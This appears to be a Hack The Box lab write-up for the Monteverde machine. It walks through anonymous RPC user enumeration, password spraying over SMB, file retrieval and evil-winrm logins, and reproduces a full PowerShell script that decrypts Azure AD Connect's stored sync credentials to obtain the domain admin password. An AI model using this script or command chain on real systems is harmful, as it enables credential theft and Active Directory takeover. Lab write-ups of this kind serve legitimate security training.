MonteVerde HTB walkthrough
Ok starting off this Writeup i start with a nmap scan on the ip with the comand of nmap -sC -sV (ip ADDR) to then see what I get back fr the results.
After getting some results back we can see that we have a bind RPC connection as well as port 445 that usually associated with SMB or and Active Directory. With this in min I try a RPC Bind connection that usually works by default on most Windows machines with no password. For example once an attacker binds to an RPC interface, they can use it to extract information depending on their permissions and the capabilities of that interface. Here are common ways attackers use Bind RPC for enumeration: 1. Active Directory Enumeration MS-RPC interfaces like LSARPC, SAMR, DRSR, etc. can be bound to and queried. Tools like rpcclient or Impacket’s lookupsid.py, lsaquery.py, and samrdump.py bind to these interfaces to: Enumerate user accounts. Enumerate domain trusts. Query SID (Security Identifier) to username mappings. Pull policy information. With this in mine i get a RPC bind connection with the command of rpcclient -U '' -N (ip) , with that in mind the -u (username) with be blank so its just quotes '' and -N flag stads for (No password).
Once the RPC connection is bound you can type the Help command to see the various options you have, i went ahead and did the commsnds of querydispinfo which "querydisp info" refers to the process of querying for information about the available RPC interfaces and procedures on a server. This information includes details like the UUID and version of the RPC server, as well as the names and parameters of the exposed procedures. as well as enundomusers which basically enumerates the users on the network.
And now all you do is copy all the username found over to a notepad and save it.
After that is done and saved what you will want to do is run netexec since we know port 445 with SMB is open and we will use the username list as a password list as well to see if any default accounts with default credentials are on the accounts. With the command of netexec smb (ip) -u (your file) -p (your file) --continue-on-sucess
After running that command we will wee see get a match of username and password with SABatchJobs
After wards I decided to do a smbmap to maybe scope to see any file shares were accociated with the user , and sure enough there were a couple with read only permissions worth dinning into. with the command of smbmap -H (your ip) -u SABatchJobs -p SABatchJobs
After looking around there is something in the $users folder shows up with a azure.xml file thats worth downloading.
And just to download it the command will be smbclient -U SABatchJobs //(your ip)/users$ SABatchJobs -c 'get mhope/azure.xml azure.xml'
I would recommend opening it in VIM (even tho there isnt escape xD) and we can see the is a password of 4n0therD4y@n0th3r$ that then we can use to Evil Winrm into.
And then you just rm into it with Evil Win rm with the command of evil-winrm -i (ip) -u mhope -p '4n0therD4y@n0th3r$' and bam you shuld get a connection.
and if you go to the desktop you should see the user flag of user.txt
For Enumeration after wards I head over to the C drive and see what is in the program files , I see Microsoft Azure ADSync is and AD connect as well so I decide to see where it is to confirm.
For Enumeration after wards I head over to the C drive and see what is in the program files , I see Microsoft Azure ADSync is and AD connect as well so I decide to see where it is to confirm.
Afterwards to confirm i ran the command of C:\Program Files> Get-Item -path HKLM:\SYSTEM\CurrentControlSet\Services\ADSync to verify and i was able to show me the path and binary its running on so its confirmed to be on the system.
NEXT for the enumeration to root I was looking online for ADsync i found a blog that is https://blog.xpnsec.com/azuread-connect-for-redteam/ and when scrolling down you will see the explination as well as a powershell script that works for ADSync Attack. I will paste the script below and you can copy and paste it , save it as a PS1 and upload it and run it.
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=127.0.0.1;Database=ADSync;Integrated Security=True" $client.Open() $cmd = $client.CreateCommand() $cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration" $reader = $cmd.ExecuteReader() $reader.Read() | Out-Null $key_id = $reader.GetInt32(0) $instance_id = $reader.GetGuid(1) $entropy = $reader.GetGuid(2) $reader.Close() $cmd = $client.CreateCommand() $cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'" $reader = $cmd.ExecuteReader() $reader.Read() | Out-Null $config = $reader.GetString(0) $crypted = $reader.GetString(1) $reader.Close() add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll' $km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager $km.LoadKeySet($entropy, $instance_id, $key_id) $key = $null $km.GetActiveCredentialKey([ref]$key) $key2 = $null $km.GetKey(1, [ref]$key2) $decrypted = $null $key2.DecryptBase64ToString($crypted, [ref]$decrypted) $domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}} $username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}} $password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerXML}} Write-Host ("Domain: " + $domain.Domain) Write-Host ("Username: " + $username.Username) Write-Host ("Password: " + $password.Password)
After running the the script we got a password of 'd0m@in4dminyeah!' so now we can try to login with the creds to Administrator with Evil-winrm with the command of evil-winrm -i yourip -u administrator -p 'd0m@in4dminyeah!'
And if you head to the Desktop folder of Admin you should get root flag.
